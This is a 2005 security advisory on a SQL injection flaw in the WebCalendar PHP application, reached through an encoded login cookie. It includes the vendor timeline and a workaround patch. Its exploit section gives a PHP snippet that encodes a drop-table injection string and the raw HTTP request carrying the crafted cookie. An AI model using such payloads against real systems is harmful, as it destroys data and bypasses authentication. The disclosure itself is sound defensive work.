[ SCL-2005.001 ] - WebCalendar: SQL Injection from encoded cookie

2005-02-18T00:00:00
ID SECURITYVULNS:DOC:7860
Type securityvulns
Reporter Securityvulns
Modified 2005-02-18T00:00:00

Description

=====[BEGIN-SCL-REPORT]=====


                Scovetta Labs Security Advisory

Title: WebCalendar: SQL Injection from encoded cookie Status: Public Release Date: 2005-02-16


Package: WebCalendar Vendor: k5n.us - http://www.k5n.us/webcalendar.php Priority: High Vulnerability: SQL Injection

Affected Versions:

0.9.45 is vulnerable. Previous versions have not been tested.

Background: (official description)

WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be downloaded from [1].

Description:

WebCalendar is vulnerable to SQL Injection attacks launched through an encoded cookie that is inserted into a request. Using a locally installed version, and an MSSQL back-end database (ODBC), we were able to drop an arbitrary table from the database by launching an attack as a non-authenticated user.

Analysis:

The user_valid_crypt function (includes/user.php) fails to validate that the login name consists of legal characters. This function is called from a validation routine (includes/validate.php), with data derived from the cookie. The cookie is encoded (not encrypted) and consists of data in the following format:

    [login]|[salt][crypt(password, salt)]

When the cookie is decoded, the login is placed into a SQL query and executed. Based on the data returned, the user is either authenticated or otherwise the cookie is cleared and the user is directed to login again.

The vulnerability is exacerbated when the underlying database allows for multiple SQL queries to be executed together, as in:

    select 1; select 2; select 3;

Exploit:

<?php include_once 'includes/init.php'; echo encode_string("'; drop table foo; select 'a|zzabcdefg"); ?>

output: 7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd \ 94897d7882858abbb8

attack payload:

telnet servername
GET /login.php HTTP/1.1
Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c &#92;
        8e906075c47f7b817993414cb6cd94897d7882858abbb8

Work-around:

You can mitigate this by using the following diff patch:

39a40 > $login = addslashes($login);

The vendor has released version 0.9.5 which includes a fix for this issue. All users are encouraged to upgrade to the latest version of WebCalendar.

Vendor Response:

2005-01-31 - Vulnerability discovered. 2005-02-01 - Vendor contacted. 2005-02-01 - Response received from vendor. 2005-02-09 - Version 1.0RC2 released on vendor site[2]. 2005-02-16 - Advisory released.

Revision History

2005-02-01: Initial Draft 2005-02-14: Public Release [0]

Credits:

Michael Scovetta of Scovetta Labs discovered this vulnerability.

References:

[0] http://www.scovettalabs.com/advisory/SCL-2005.001.txt [1] http://www.k5n.us/webcalendar.php [2] http://www.k5n.us/files/WebCalendar-1.0RC2.zip

Disclaimer

The content of this report is purely informational and meant only for the purpose of education and protection. Scovetta Labs and Michael Scovetta shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. All identifiers (hostnames, IP addresses, company names, individual names etc.) used in examples and demonstrations are used only for explanatory purposes and have no connection with any real host, company or individual. In no event should it be assumed that use of these names means specific hosts, companies or individuals are vulnerable to any attacks nor does it mean that they consent to being used in any vulnerability tests. The use of information in this report is entirely at user's risk.

Copyright

(c) 2005 Michael Scovetta. Forwarding and publishing of this document is permitted providing the content between "[BEGIN-SCL-REPORT]" and "[END-SCL-REPORT]" marks remains unchanged.

=====[END-SCL-REPORT]=====

-- Michael SCovetta Scovetta Labs www.scovettalabs.com